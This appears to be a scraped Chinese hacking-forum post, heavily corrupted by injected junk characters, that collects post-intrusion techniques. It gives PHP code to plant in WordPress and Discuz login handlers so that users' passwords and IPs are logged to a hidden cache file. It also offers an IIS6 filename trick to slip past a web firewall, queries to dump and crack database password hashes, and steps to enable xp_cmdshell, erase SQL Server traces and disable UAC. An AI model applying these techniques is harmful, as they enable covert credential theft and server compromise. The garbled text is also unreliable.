}) P# Z7 a/ k7 l. h1 U2 _
当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
v) T- v, G9 L- V就是搜索case ‘login’, |- `8 t! M7 m8 }0 n
在它下面直接插入即可,记录的密码生成在pwd.txt中,
7 D6 c; \; G- w# H其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录4 s0 N* J1 h4 X) P/ X( \
利用II6文件解析漏洞绕过安全狗代码:! o% P0 j2 j) |' r9 v. T
;antian365.asp;antian365.jpg( x2 E& t6 V# [. I7 m/ L0 t/ I
; C! x; s' V, B1 u
各种类型数据库抓HASH破解最高权限密码!+ `" N' f3 p8 p7 J7 S
1.sql server2000& M: p% }. H: I6 O! q
SELECT password from master.dbo.sysxlogins where name='sa'
/ W6 c% S9 R$ h) y0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED2503411 w3 [0 H3 P8 G1 S/ A& a
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A. d3 j- b: Z* ?
* u r1 s6 r$ n4 c3 p, U
0×0100- constant header
( F9 w7 C% x) t7 C34767D5C- salt
. T* P1 \+ h4 d9 S0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash
' z8 Q& s9 S1 P; w# Y2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash4 c( G. P8 I }, x
crack the upper case hash in ‘cain and abel’ and then work the case sentive hash5 L$ k; k' b- y4 W
SQL server 2005:-: Y2 I5 `8 s8 ?: M5 Z
SELECT password_hash FROM sys.sql_logins where name='sa' @' k. f; P4 Y1 R* K8 v$ w% g
0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F6 A( t9 H. O6 w" }
0×0100- constant header# t: Q2 I7 D* ~3 {
993BF231-salt8 p f. |3 }. V6 i& u0 _7 A7 a% p
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
7 ?, u' z& b8 O9 J, Icrack case sensitive hash in cain, try brute force and dictionary based attacks.
) T! O/ u; ^# w, e* m
, V6 I! y5 E" t7 b0 @update:- following bernardo’s comments:-
, r0 u. i6 ^. K c$ @use function fn_varbintohexstr() to cast password in a hex string.
6 e- s7 M F. s J9 w& Ze.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins# l- R- B0 F/ a' h3 w, Z
* b0 n3 r5 ?) K- \MYSQL:-: t3 w6 r9 B* O4 T, U
* R) B2 u" j% W5 v9 |5 K2 IIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.
" s) Q& U. `0 S( `$ Q: p: r. o t4 d/ D. j5 J8 O
*mysql < 4.1
2 c% X( g( H3 `2 i* A
8 O3 t. m, `& e# C& lmysql> SELECT PASSWORD(‘mypass’);8 D, Y+ ^" X4 `$ E" L) h* Z
+——————–+% k+ e# D, u# M# R8 ~- W9 Z; `) f2 y
| PASSWORD(‘mypass’) |
" r1 ^4 e0 ^* i% C/ U+——————–+
. m" L* i R2 z& P! Q% Z1 u| 6f8c114b58f2ce9e |, [7 s4 L0 P. w: U( N' u
+——————–+
: f& y$ i( s' R- Q/ j2 ~ W. Y" | U$ p# k/ l( p
*mysql >=4.1
, r% k; |+ l& I! \! W
3 `+ R( t: \/ B- X. {4 D. J# Lmysql> SELECT PASSWORD(‘mypass’);$ M' k( x. ?; q# K
+——————————————-+
6 T2 W/ _& |6 H; L1 n+ d1 m| PASSWORD(‘mypass’) |) F: L8 e7 H" }& c
+——————————————-+
: D/ R/ s4 u) U( \; h- I p| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |
5 o( ^8 C( W; A1 N; P+——————————————-+2 a6 B9 @2 F- W# U2 V G
4 I3 `/ ^; x2 e' R# |7 ~8 R
Select user, password from mysql.user
9 ?- f0 \7 t( C* W: NThe hashes can be cracked in ‘cain and abel’
6 E1 w, ?# u/ [
4 O& V4 z+ F' c0 LPostgres:-
/ T: |. h9 C- @' K6 j/ F4 `Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table. You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)% B9 o2 r+ T! J8 m: |% j
select usename, passwd from pg_shadow;
2 a) U/ f9 k" Q7 ]% B. R+ Zusename | passwd( F j' b' B0 ^5 j' G: Q" f+ {9 n
——————+————————————-
: a+ }0 x2 o H5 ?6 ttestuser | md5fabb6d7172aadfda4753bf0507ed4396
8 [& |5 T0 B' \: y G3 Z2 \use mdcrack to crack these hashes:-
B6 o4 Y- ~- r0 X$ `, Q$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396
) i. S# ], Q4 `5 m
( Y+ A7 B, O1 R- s4 ^# S) dOracle:-1 h9 S+ W: x3 n2 N) ^: r4 e
select name, password, spare4 from sys.user$
+ ]7 u* c( s$ yhashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g' P5 n& f& o" W6 o3 Y9 N
More on Oracle later, i am a bit bored….! i4 x9 H6 {3 A
. ^4 q1 Z9 _! P+ N- {) _: H# }- t; G
在sql server2005/2008中开启xp_cmdshell
+ w6 ?' o0 w/ k$ L6 z4 U-- To allow advanced options to be changed.* W5 C/ r9 Z# y& A6 f; V2 F, Y
EXEC sp_configure 'show advanced options', 1
! d( x- B v8 @- p ?- [. |; PGO$ J) |7 T' y1 s! ~) U5 C! N& i
-- To update the currently configured value for advanced options.
0 H' R j, p0 h! f$ WRECONFIGURE9 r2 M/ F8 S. |0 v! S3 j6 ]
GO
7 ^5 ^: R8 {! t% H-- To enable the feature.+ _) o) y0 d L. W+ X
EXEC sp_configure 'xp_cmdshell', 1
7 j' o: H6 R- l9 S' R- L0 q% wGO
% ]- r3 \/ C& Z( d-- To update the currently configured value for this feature.! N# {: H7 p @
RECONFIGURE
% T' ?$ C o5 jGO
5 P7 h6 f# \1 M+ QSQL 2008 server日志清除,在清楚前一定要备份。
/ ^8 s3 a6 W$ C如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:% ?, X+ j5 o0 o( c7 y2 Y) R3 O
X:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
! ] z. i! \" W* P! A+ G# V& R$ L$ p5 z& l2 n
对于SQL Server 2008以前的版本:* [' `& I7 o4 \9 x: i, o
SQL Server 2005:: H/ g/ [8 p& q) y4 Q0 ~4 l0 J
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat2 B9 w! p7 d q/ g% v U: z
SQL Server 2000:
6 a9 M8 L; K v% C! S$ t清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers\相应的内容即可。
% I2 R, }" Y( `1 g# |9 @5 C* }$ g8 x
) b( e E2 x# X+ M本帖最后由 simeon 于 2013-1-3 09:51 编辑
# l8 B" _5 @+ x* l
7 ^8 {8 C7 G: h3 H7 r5 M6 Q$ W- x
windows 2008 文件权限修改7 n' @$ {1 ~/ Z4 w: o) d9 C. Q1 f
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
$ `2 Z- x2 t0 }6 `2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad98
3 u1 m( J4 {- M# @3 V一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”," X. f& ^4 \7 n) W4 i. T
) F% O5 T+ D' D( U* P2 |, C
Windows Registry Editor Version 5.00( e% @! t/ z* l
[HKEY_CLASSES_ROOT\*\shell\runas]2 m0 c( x# `2 F' f7 \+ v
@="管理员取得所有权"9 F7 ?2 d' v3 j# M
"NoWorkingDirectory"=""
% J9 t- l6 b0 ^ m[HKEY_CLASSES_ROOT\*\shell\runas\command]
$ @. b/ J3 a% A( ~3 e+ z@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"3 `1 s3 E; }+ U6 B+ g
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 b' c4 l: Z* t) }' h" X+ Q* g2 d/ w[HKEY_CLASSES_ROOT\exefile\shell\runas2]; N- f. ~6 e: K. Y; z, C' d
@="管理员取得所有权"
& _9 B# y7 [! m3 o0 @9 f( S"NoWorkingDirectory"=""# D3 {( b9 H* h# B6 Y7 ?
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]8 c/ e% ~7 [, c" t4 f/ O
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
% h2 ]! ], @6 h5 z8 g. V. S"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
7 ?$ e, {1 X6 u5 G3 e
- Q% B7 P, k; g% a- g[HKEY_CLASSES_ROOT\Directory\shell\runas], N: d0 n/ ^+ ?
@="管理员取得所有权"/ d4 J8 U" c0 s$ W4 p+ ]
"NoWorkingDirectory"=""
, x) H2 |) V1 T. X[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
$ ^, K$ J, F) [3 R; L# K7 ?@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"2 s, K4 z8 k$ C+ m
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"; }. v4 D2 Q5 x! w4 h
! j& V s: W; h% j# o2 e+ B0 `. a
/ ]2 p* S* }; ]win7右键“管理员取得所有权”.reg导入 s: A% M( j. x S! T8 S
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
4 X' m4 d3 l) u2 J q4 ?- v3 @/ r1、C:\Windows这个路径的“notepad.exe”不需要替换. A( E9 Y. z8 S1 n
2、C:\Windows\System32这个路径的“notepad.exe”不需要替换
( {, D6 X' w# g+ ^7 S2 y3、四个“notepad.exe.mui”不要管8 X- }. [. M- x* A9 P; e7 q: ^0 p
4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
) s! t* W: p2 v6 L1 A. xC:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”
$ [* k; G6 B5 M$ n( X! [1 U! h2 J3 s替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
/ [+ E q9 E- M& t9 q2 y替换完之后回到桌面,新建一个txt文档打开看看是不是变了。# [7 o/ I4 D/ |6 G. b
windows 2008中关闭安全策略:
9 V. {: H7 T' }. Freg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
) q! b' U3 [& T( L修改uc_client目录下的client.php 在
2 m( K" @: k I) `6 l; b' ofunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {
7 C3 n7 G2 I# f+ o% E下加入如上代码,在网站./data/cache/目录下自动生成csslog.php$ Y6 L- M! d' ]# X8 p/ F, K) v
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw) a A$ F$ O& G' C1 n5 H {
if(getenv('HTTP_CLIENT_IP')) {
b+ S7 `/ }- ]7 q) _$onlineip = getenv('HTTP_CLIENT_IP');
+ }+ M7 D# p* R! L6 {( ^) [} elseif(getenv('HTTP_X_FORWARDED_FOR')) {
. t& m# ?" Y3 A$onlineip = getenv('HTTP_X_FORWARDED_FOR');
8 K. Z( v# X/ y( t8 J} elseif(getenv('REMOTE_ADDR')) {9 ^7 v4 M f2 X L+ }1 x: s
$onlineip = getenv('REMOTE_ADDR');
; f7 p4 `' e u$ s) G# v8 O& S} else {- W) y9 O% i, f! M' ^ Y' M
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];; Z0 H' [" _$ e3 N$ ~4 m4 m8 t7 Q
}/ y+ J9 R1 f3 f- z
$showtime=date("Y-m-d H:i:s");
( W5 R4 e. v; h/ W. z& u $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";: h# n- q! f( s2 b& V
$handle=fopen('./data/cache/csslog.php','a+');( U- Y. _! C& B7 y
$write=fwrite($handle,$record); |